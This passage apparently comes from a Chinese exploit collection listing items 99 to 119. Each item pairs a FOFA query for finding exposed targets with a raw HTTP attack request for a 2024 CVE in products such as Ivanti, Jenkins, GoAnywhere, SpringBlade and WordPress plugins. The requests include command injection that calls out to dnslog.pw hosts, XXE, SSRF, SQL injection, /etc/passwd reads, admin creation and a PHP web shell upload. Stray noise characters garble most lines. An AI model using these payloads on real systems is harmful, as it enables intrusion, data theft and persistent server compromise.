2 `4 e4 E- K& { v6 vContent-Length: 121
) A' t% P% r) V H8 GAccept: */*
X% R0 G- T8 Z" k% l: S2 _Accept-Encoding: gzip, deflate9 J E/ i& x" G- m7 \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 [3 P! }! w3 \
Content-Type: application/x-www-form-urlencoded; charset=UTF-8/ t$ R; u' U9 d4 Y
X-Requested-With: XMLHttpRequest+ P9 u" H# o5 }
# j( t" Y& \& S& n
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B9 _1 E1 S7 t9 A, [# h1 b) [
1 t& d F: Q7 l _3 V+ A
1 e: w! b8 l" ]6 C) `! {99. Ncast盈可视高清智能录播系统busiFacade RCE
/ A2 z! h6 K* i0 HCVE-2024-03057 m0 S2 _7 P+ ]1 \
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
/ ^* O- g! k& h8 y, ], @) F6 U( xPOST /classes/common/busiFacade.php HTTP/1.1+ W7 c; F+ k5 U6 [- _7 `
Host: 192.168.40.130:8080
* d9 R a2 ]" w( S" D3 y8 E( QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ d2 S: m5 s1 D9 aConnection: close
2 s/ p) d0 a4 }# P" }& TContent-Length: 154
. S5 N& \0 w/ r Z' s" `Accept: */*/ |' n3 ^6 l# j) f: ^# r9 }
Accept-Encoding: gzip, deflate
3 `3 Q. H* m+ O( q0 qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' Z5 w# d( X6 q! E2 U3 Y7 G
Content-Type: application/x-www-form-urlencoded; charset=UTF-80 @2 {0 m/ L$ n6 f/ Z, K
X-Requested-With: XMLHttpRequest, p" |( s) u2 \2 b3 ?
( G2 q" f$ K% ` n
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D* x1 I9 a8 t/ B& x+ H
! ?! N* c0 G3 E$ M' g; ]( H! T/ m3 r+ T S2 k" D+ I6 n$ {
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传+ K5 _" [! j) P
CVE-2024-0352
6 E) ?/ ~# [* y& b" ^2 Z+ |# i3 UFOFA:icon_hash="874152924"
% |- b8 r' u" V5 fPOST /api/file/formimage HTTP/1.11 S6 T8 q C% }- E
Host: 192.168.40.1307 [9 t+ x, ?& q( j! Y$ e" X
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
6 _$ R+ u. K) g- u r5 K) QConnection: close
* ]# Y2 O; L' P8 f: a1 \4 @Content-Length: 201
4 S: ^3 n4 F+ s# m7 S7 m6 qContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei7 D3 d3 l, H- I% m6 z
Accept-Encoding: gzip
. z3 M- K7 b n! [% C9 y$ X% r- i8 G$ ^4 h6 z0 i5 s) n5 Z0 ^3 v
------WebKitFormBoundarygcflwtei* y0 j5 j( }: C- Z/ Q* e3 K
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
" W; h) Q: f( zContent-Type: application/x-php% L6 @1 |$ j6 G8 l. \( {0 a
9 z) V5 Z* P; d- A: Q2ayyhRXiAsKXL8olvF5s4qqyI2O
1 P# R& U8 Q" W. j- X------WebKitFormBoundarygcflwtei--1 H4 V( |! S, F9 P# Q, C2 }
1 s* }( ]. Z7 Y- m3 Z* J' }" v/ o( s2 k9 L0 Z) W/ U
101. ivanti policy secure-22.6命令注入
3 N4 k: H& o# s. B6 |CVE-2024-21887) r C' A$ v' L* j
FOFA:body="welcome.cgi?p=logo"
7 s- }' `/ ]' @4 N! J) O# o- R9 NGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1+ J$ |. P+ s2 X. n2 h N) D
Host: x.x.x.xx.x.x.x
5 L, M; {5 `; B/ z' R+ k! NUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.365 q: Q: s# H9 v0 _8 \# _; {& z- Y
Connection: close- l8 O9 T* E4 m8 A* f. z0 _1 o
Accept-Encoding: gzip
' L+ Z' O( X3 t, p8 N8 S* R$ E+ k3 R" n L u
8 V- \5 j' m' z/ U# V. O Y102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
' q5 h% G, ^ i. j8 e9 p9 BCVE-2024-21893; I% z- q z& C; O. z( r
FOFA:body="welcome.cgi?p=logo"
" C0 ^" e/ Q/ k: KPOST /dana-ws/saml20.ws HTTP/1.1# y; m3 A( c# h" C: b
Host: x.x.x.x; k4 W- w8 |7 n: ~( H/ }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36) R& `3 x& S, ^- K7 S
Connection: close
: m1 M/ ]8 W5 oContent-Length: 792/ @. @* g* f4 l5 c: T9 D9 ?
Accept-Encoding: gzip7 S/ c" ?- [* V2 f8 m' q# e
+ U5 s$ d. x% R5 e9 ~8 O0 g<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
# V2 L( W$ _& J( z+ a1 T$ U2 k L" J9 c1 i3 y8 P5 X9 G
103. Ivanti Pulse Connect Secure VPN XXE; _+ Q0 C. Z% P1 }3 H
CVE-2024-22024
; O: I' ?8 s7 g9 U5 SFOFA:body="welcome.cgi?p=logo"
$ c e7 ^: `- p4 APOST /dana-na/auth/saml-sso.cgi HTTP/1.17 H2 a4 N, t2 }% |
Host: 192.168.40.130:111
' z" m, Y* j( z! g' ]: K ?User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36( L; M$ E! J& Z. a& t9 _
Connection: close5 I- V: J( i3 d. H: T
Content-Length: 204( K! ~, _$ b; J2 N) j) [' F4 t
Content-Type: application/x-www-form-urlencoded
2 q1 z. f) F" F% b# S1 ZAccept-Encoding: gzip6 k6 L3 k) w& X- {! {
. r. }, R6 R* d5 T7 ^8 r7 k
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
/ }$ g. i) {3 c. m: a; U
/ j8 o' V, @3 L% `( B* {- x' w# H$ X1 @8 t; J3 w8 ` D: y6 ?; c7 p
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下- B; l' r' Q* K; I+ m
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>& }- [0 T7 X6 @/ P( c# J, c$ c& z
. z% _/ ], c* E: q9 n
" S- N$ S7 l3 }7 M5 U4 A104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露# {" `9 r2 o1 t8 l" ^* W
CVE-2024-05696 p+ }# T1 a" V0 C, u9 j! e; b3 M- n
FOFA:title="TOTOLINK"1 I# F! p8 N8 B# e2 T5 w
POST /cgi-bin/cstecgi.cgi HTTP/1.1
! g$ X3 f% K7 l7 R s2 p8 g: @Host:192.168.0.1
. k( d4 v; _7 l( H* T; JContent-Length:41
1 a; H$ C F8 ?* s ~7 uAccept:application/json,text/javascript,*/*;q=0.01
- `5 u8 M) H$ M" {' K( l# tX-Requested-with: XMLHttpRequest
2 y. j$ w# ^) u2 ^7 e! fUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36& f: q; M; F" z3 x$ r
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
( q1 _( g: b) [9 fOrigin: http://192.168.0.1% b( B# f: ^, A, P) S
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
( Y- S' x- @" y* x& rAccept-Encoding:gzip,deflate) |% o. n' [ ?! E" ?
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7! X9 k& f ^& b- D' K3 d
Connection:close9 d; r' i* ^4 A" M
- v! M1 b+ C( @% T/ o7 Z5 }{
+ q/ ~+ I6 I, }0 |& X2 g"topicurl":"getSysStatusCfg",$ T8 C% i+ }9 c( L# G7 Z/ p
"token":""! u' ]5 n( f" |; A# o. e
}
5 o; G B% I) N. H% ]6 r& n# v, H' T# O, H2 v" b
105. SpringBlade v3.2.0 export-user SQL 注入
# B- a* R2 b* K6 f7 gFOFA:body="https://bladex.vip"
" ~2 h3 Z% c% G+ W0 g# q% \3 C& Ehttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
; S' e2 {8 ~& i# E7 [9 |
/ ?' e5 C/ x/ t+ Z" ^106. SpringBlade dict-biz/list SQL 注入4 O1 d. i( F/ s: p
FOFA:body="Saber 将不能正常工作"
0 {# k& Y' m1 a9 ]GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
" A6 M |8 [% M& G. gHost: your-ip+ M l5 N- E) F, Y- c# s# C( g* {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 `$ C1 l0 E( D* ^. f% JBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A$ [" _4 R* g6 G! r
Accept-Encoding: gzip, deflate5 X w( R2 J2 m; r% }# w2 O1 W0 @
Accept-Language: zh-CN,zh;q=0.99 M2 E- G, e/ @
Connection: close f# U+ A7 l. G, x6 |
, D: F3 a6 ^. Z% {
: d/ U9 Z& a& h' Q, p g5 c% j107. SpringBlade tenant/list SQL 注入, a3 Z3 W& _) L9 |$ N1 r3 ^# f
FOFA:body="https://bladex.vip"
8 ~1 e3 ~: G0 F0 R1 UGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
, F" w; u6 Q9 @Host: your-ip b. ~6 t& H8 D) e* v6 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 }7 y' _: l5 z* E8 y6 e
Blade-Auth:替换为自己的
& j8 D, F% W+ {8 V9 jConnection: close+ ]: a% o0 c! j% n$ u/ T' R$ U
! f* S5 w: t5 m T. m& f
3 V+ G7 i( p( J( N! l6 l108. D-Tale 3.9.0 SSRF
. h1 }5 p; H* P: i" TCVE-2024-21642
4 ? h3 B5 [& j+ U8 E! RFOFA:"dtale/static/images/favicon.png"
+ M( A! ^7 r6 @; \4 z2 XGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
1 W" Y* a7 @. y3 [5 P; _8 }) hHost: your-ip
5 N: O/ G3 d6 jAccept: application/json, text/plain, */*
. v$ w* H# G1 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.360 d: D$ {/ F0 H' L+ B
Accept-Encoding: gzip, deflate
5 p/ B& S# F/ l; A6 O& U9 ?5 [Accept-Language: zh-CN,zh;q=0.9,en;q=0.8; C$ F' z; b4 H0 G5 H- s# Z
Connection: close
$ j+ }+ j/ y j0 R8 ~4 R" d
7 b) r9 }) Z1 p$ N3 H' N5 A/ n6 [$ I; _
109. Jenkins CLI 任意文件读取
4 l* A' R! q1 cCVE-2024-23897/ G0 N6 n, ~- }7 Y2 H2 X. e1 [
FOFA:header="X-Jenkins"
9 w! ]3 y# H; L7 a5 B& {. cPOST /cli?remoting=false HTTP/1.18 ]1 ?' X" W) k. s. h# h
Host:% O% M6 G. I0 y. I! R% R. ^+ J1 a
Content-type: application/octet-stream! L1 y# t5 {7 E' C
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92$ G7 l5 [; G( E* Z- A9 S1 B( p
Side: upload
7 |" x' D- k* M# L7 k- f/ L; RConnection: keep-alive8 r# o, `$ N0 g" T. v
Content-Length: 163+ N5 ~) v$ S# v+ K2 r
* e- I" o9 m0 {
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'* Z3 E/ ~2 L# y
. |3 k w$ o( X0 {
0 A5 v( t6 s m4 K7 v! BPOST /cli?remoting=false HTTP/1.1
* [) ?3 |) w3 `0 `Host:
9 O8 _% \$ h6 WSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
& C' ?- R5 |1 odownload1 R' ~0 b5 U" j6 D1 V
Content-Type: application/x-www-form-urlencoded: Q+ @ G& o1 X
Content-Length: 04 }7 |! F& p+ ]. E( d6 L4 H1 r9 L
) O" y" `+ {7 Z
% T- t0 z0 `+ H3 r- sERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin( b* i e/ H( F7 E4 \$ Q; W
java -jar jenkins-cli.jar help
" R2 e# V2 _0 [; N9 E, R4 O$ g[COMMAND]
6 p# i$ t3 `" B* fLists all the available commands or a detailed description of single command.
' W9 d' j7 z; X COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)0 t# J- h$ n; |0 ?" U9 a, D' d
" ^( W3 a3 u" P5 ]& o& M
1 ~$ m0 P f0 E' g7 N: J3 ]110. Goanywhere MFT 未授权创建管理员
3 g0 Z7 c9 ]! o+ [" bCVE-2024-0204
% L N* T/ ~) w+ R3 Q2 [FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"# G% S9 E$ A- Q9 h J B7 S( p8 U
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
# N4 _! X& Z* i# ZHost: 192.168.40.130:8000
u) r% s' R# M9 \% o# [User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
$ s9 r$ x) j9 k% B( A" F# NConnection: close' v# Q% u6 B& z
Accept: */*! i; W, Z! w$ ^3 r
Accept-Language: en% }- p4 k% v5 Y+ K
Accept-Encoding: gzip
5 u4 M; T0 {9 y* \5 o5 c& Q! N+ m; @8 y) c$ F4 g9 b: k
5 {0 B1 [# h9 I! b! h111. WordPress Plugin HTML5 Video Player SQL注入
* r7 v6 v3 f, D2 T# ^: a% \CVE-2024-1061
8 ~; g* t, |1 \% z: x! fFOFA:"wordpress" && body="html5-video-player"
5 n3 x! r# u$ G" o) wGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1/ p7 Q! M |5 a8 \: u' J% J
Host: 192.168.40.130:112$ w x# s5 Z9 h' j
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
5 b6 P7 j0 W. q( f- h# |- R+ SConnection: close
; {8 J. P! K; L9 X; \; y$ v; ^9 TAccept: */*+ e" m; e3 u' ~' F7 G& c: M2 H
Accept-Language: en+ Q, \3 l. H: S
Accept-Encoding: gzip/ i3 G* N/ f# N# C3 L
, ]; w: D u7 k
- d# C2 A, q# ~/ K& B" C112. WordPress Plugin NotificationX SQL 注入% b/ u! i2 Y6 d3 a1 V: y. `
CVE-2024-1698
( t, w5 \: C$ C: j, \2 r t) j: U" GFOFA:body="/wp-content/plugins/notificationx"0 T2 @% N$ `/ Y* E: n. t
POST /wp-json/notificationx/v1/analytics HTTP/1.1
& \) K1 L/ X! C" C1 XHost: {{Hostname}}
4 j u5 t* |* p, b& B; TContent-Type: application/json2 K/ R3 {7 A, \3 @2 I( J3 x; p
. L# X# P5 |. q% ?# E{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
5 t( I1 M- l6 o1 a
: G+ I8 ]( _4 L4 \, l4 ~ J+ A( j5 W* I2 r/ s7 r, w7 f
113. WordPress Automatic 插件任意文件下载和SSRF
$ c) w% F9 R! h; p6 L" NCVE-2024-27954
& }, x; H' {: S/ X4 x$ D9 FFOFA:"/wp-content/plugins/wp-automatic"8 N# T) T& e; [$ d. @. j/ d( }* _
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.11 F& i9 y+ j$ b8 ]) Z
Host: x.x.x.x
0 W2 p! ]) ^7 A8 @User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.366 g1 i' d( Z& v4 l5 `2 u* [; s4 f9 T
Connection: close& c& c" C% g# A, V( u1 W+ ]0 W
Accept: */*" h6 d( Q* Z) {* n: U
Accept-Language: en
! Q4 {8 U3 q/ K3 TAccept-Encoding: gzip- k! m0 r0 k7 H! P6 l+ n
% y# X, ?! n! n( [- R% I
. y5 y4 f1 a% g114. WordPress MasterStudy LMS插件 SQL注入# q" S, o( n& c( D4 p
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/": |/ o& G; t' B6 Z7 t3 @$ ^6 E. F
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1& i2 o7 a- A+ Z( W# a& Q
Host: your-ip4 B1 K3 e! \0 z: p& V6 c
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
9 h& [ M* T N) tAccept-Charset: utf-89 [+ P( x- ~; @4 z$ _
Accept-Encoding: gzip, deflate W: L# o: f# b" u) S2 k; V
Connection: close
2 e$ l# b: k) p+ d f; W! M
5 a# {5 e' c$ c0 x# a% \0 z% ]4 G, J$ h2 @- p2 S
115. WordPress Bricks Builder <= 1.9.6 RCE) o9 f: G, N6 _6 {
CVE-2024-25600
) ?, g" v: z( O. @( pFOFA: body="/wp-content/themes/bricks/"
4 b" V! y9 L/ D f- R2 W第一步,获取网站的nonce值
L5 d0 s+ A7 JGET / HTTP/1.1+ X4 ?1 [% s( E+ m
Host: x.x.x.x
: s2 S; O. X, N1 F+ r5 V/ GUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
, Q5 k& A% g1 S1 Z( BConnection: close4 r! c, {( E; }$ c- _" B+ i
Accept-Encoding: gzip/ _: i3 E' d& A6 L; A0 I. @
2 V3 F6 ?0 K. n" k& C; L4 K B7 t @
/ G! f; m+ F4 @2 T$ Z0 }
第二步替换nonce值,执行命令+ o2 ?& K N m) y& o* Q
POST /wp-json/bricks/v1/render_element HTTP/1.1
- F! S5 y( w+ D) V `3 w( K: @Host: x.x.x.x$ t$ y& M7 K7 E! E( g X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
3 `: h: z5 x* x0 L0 \: g8 BConnection: close x( P* I& b- Q' V% y/ }
Content-Length: 356( p: C* ?$ C+ i, S; U
Content-Type: application/json
- g) D9 r/ [# Q3 E5 V, d4 uAccept-Encoding: gzip7 z* B6 \& R8 W: C1 \" _/ ]
- b0 J7 p- G5 F& |{1 J2 N) m/ Y% b+ v
"postId": "1",
( ^, |- }" d$ t% T$ t' j "nonce": "第一步获得的值",
( X a" i% d- y "element": {
& d0 i2 o( R5 y/ E/ a "name": "container",- A# V7 u& t! n7 c& m" S" ~
"settings": {) f* v8 s8 u7 ~3 W/ R/ S
"hasLoop": "true",
0 R8 L! o: {2 I; s5 |2 h "query": {
/ h3 i: B! m8 K |4 x! e9 R' N "useQueryEditor": true,& u; E" d. c7 o& M$ }# \1 h) @# C
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",* k9 m2 k4 R; l G/ M- m1 @
"objectType": "post"
$ ~5 W( p7 b/ B# R5 P }4 \% C; B A2 e( Q, Z8 j n; Q
}
2 u# f4 W6 `' r }: L, W0 P3 P8 J& f2 o/ j0 S
}
& B( e- _. n6 G6 q: E5 s. Z0 ?0 W7 @ I( L# }: H0 I3 J* y
; f) {( y5 F. _- R" f$ K
116. wordpress js-support-ticket文件上传! Q$ k! F" r! ]: E' n0 O
FOFA:body="wp-content/plugins/js-support-ticket"( W9 ^0 l% l t! I
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1. P4 {5 J5 j! u
Host:
" N. s# Q* v, SContent-Type: multipart/form-data; boundary=--------767099171
; o1 R+ K" B$ t- U8 WUser-Agent: Mozilla/5.0
0 B! J) R) F: V" P3 n
" B0 u) a/ w; m1 `0 U+ M# t! O: s----------7670991712 m. i9 m5 F( G: _# \
Content-Disposition: form-data; name="action"
. ?* l. S) a% [, gconfiguration_saveconfiguration
' C& q" `/ m& k+ ?7 }----------767099171
' M+ B& o+ u- l3 D, w" P1 _Content-Disposition: form-data; name="form_request"
5 r; c$ q7 X0 Z6 Z3 |& R1 H ijssupportticket# H6 i/ a: ?: o3 d- i$ B- N
----------767099171
; \4 Z/ a3 L8 {7 Z XContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"6 {' G) n$ U( e! @3 c' r4 e+ i
Content-Type: image/png
/ s+ n4 w: H6 q# J" P1 X; b----------767099171--! n/ L9 x* N2 L& K1 T- }, R6 W
; E* m, P$ ^7 d" c, C$ ~6 A# w/ m- M2 m' Q' J- ?7 `
117. WordPress LayerSlider插件SQL注入
$ G; n' X) p; K! u* |version:7.9.11 – 7.10.0
! r, j7 H2 y1 W' O! U, X3 t( AFOFA:body="/wp-content/plugins/LayerSlider/"$ p5 X M- a7 W$ w+ s6 i% U0 @ Z
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
0 j6 F$ r" ~( c7 cHost: your-ip1 E5 S; s/ l/ S4 b. t) X {4 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.04 y& O( v: T4 d$ w" s, S( I; }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& l0 Q& s5 S) K7 ~+ \( r7 KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ |+ j1 J0 b3 S; K: ZAccept-Encoding: gzip, deflate, br; a" I6 K2 M$ r3 f% a$ g) m4 ^
Connection: close
: n6 }! w7 W6 d! @Upgrade-Insecure-Requests: 1
7 s9 |7 g/ P& u
+ O& x0 E2 c* K& c/ G: A
' w ~- _. d7 U) V6 ?3 g118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
1 n$ Z$ }+ w( UCVE-2024-0939
3 |; L" {- z9 S! Y# QFOFA:title="Smart管理平台"
( z( W9 W: q/ v o1 S0 B( YPOST /Tool/uploadfile.php? HTTP/1.1
% v3 L1 _% ?8 l5 n9 c1 Q" CHost: 192.168.40.130:8443
" q$ O( n$ _3 s, |' [6 r" G4 kCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8# }6 L6 `, L6 Y/ P' z+ O8 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.01 j6 h+ i; e- B+ S6 s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ h& z S; w) I* }3 }7 [% z% N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 \2 W: A1 ~# G: ~1 B( \8 [
Accept-Encoding: gzip, deflate
& _2 B+ `* Q+ d3 JContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887! K9 w8 @- X* c" R4 a' ?8 E; V6 A
Content-Length: 405
" p, R- _ z1 Y# n) @2 |Origin: https://192.168.40.130:8443! |' K: h( c& E, [: m
Referer: https://192.168.40.130:8443/Tool/uploadfile.php: K t+ L6 f3 X6 [
Upgrade-Insecure-Requests: 14 y+ D' \# N( Z' l, `
Sec-Fetch-Dest: document7 I2 [4 w' H5 ~. P
Sec-Fetch-Mode: navigate
. I W+ [, u$ LSec-Fetch-Site: same-origin
! w# ]6 w- `. \, Q, o. f7 _Sec-Fetch-User: ?1
7 m; y g" ?, R1 E( Y& ~1 pTe: trailers
! A/ C- u1 A( RConnection: close
2 @6 J/ @" Y5 Y$ I0 U: a
W N; W w% \! M4 A1 p% O3 k! _-----------------------------13979701222747646634037182887
, L% j( D6 K# k# y) b0 B; L. `Content-Disposition: form-data; name="file_upload"; filename="contents.php"
: X( i' h$ ^0 z, kContent-Type: application/octet-stream
7 j. T, p2 K z! T) {0 h$ }# u& h" G
0 p2 Q3 |- b% ?/ E<?php
2 ~% I% H- G3 c) ^system($_POST["passwd"]);4 Z6 g; x/ k1 t0 e
?>
) |" z& v- w. B! c. E& k$ A-----------------------------13979701222747646634037182887$ r* H7 X p8 t( p. Z- Z, k
Content-Disposition: form-data; name="txt_path"
& P; [+ g: ~1 C; ~' n+ q$ {! m7 c
/home/src.php1 Q/ x2 R( K( P, t: g
-----------------------------13979701222747646634037182887--
9 V4 C. i4 w3 P! Z+ A, p1 G6 h0 D: @6 y( @6 W7 a
' T3 V( K& R5 I: ]+ t/ d
访问/home/src.php; J9 v5 ^# W% r2 t
- s$ A$ ]$ i" Q) ? {. K
119. 北京百绰智能S20后台sysmanageajax.php sql注入. P3 n) j z) A; \+ A4 {
CVE-2024-1254, x( \# I" P4 }' d C
FOFA:title="Smart管理平台"1 M- i# b/ C9 W) B
先登录进入系统,默认账号密码为admin/admin2 K6 o9 _+ a$ S" J9 l& c
POST /sysmanage/sysmanageajax.php HTTP/1.11 Y8 `$ Y _; S, \: _9 R' q/ {
Host: x.x.x.x
1 A0 N' r3 K/ |" XCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
; q2 S6 H, T- U$ V4 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
5 ~5 k6 r! |0 KAccept: */*
7 o" x; A9 ?1 H9 I. W7 L# W) e, yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: _( i% w" J" L& H9 m
Accept-Encoding: gzip, deflate- X8 l; D$ o7 P; b% f& e- [3 r
Content-Type: application/x-www-form-urlencoded;( X& C h- P7 Y' n
Content-Length: 109
* V0 V6 @7 @0 x4 W3 v2 `. j0 }Origin: https://58.18.133.60:8443
: R/ T& v3 S% i+ G ^Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php2 L2 O" D& {9 ]2 F9 B
Sec-Fetch-Dest: empty6 O7 P) E! q% u
Sec-Fetch-Mode: cors2 O9 m7 `2 ~, P' j# }- I2 r4 l/ p
Sec-Fetch-Site: same-origin
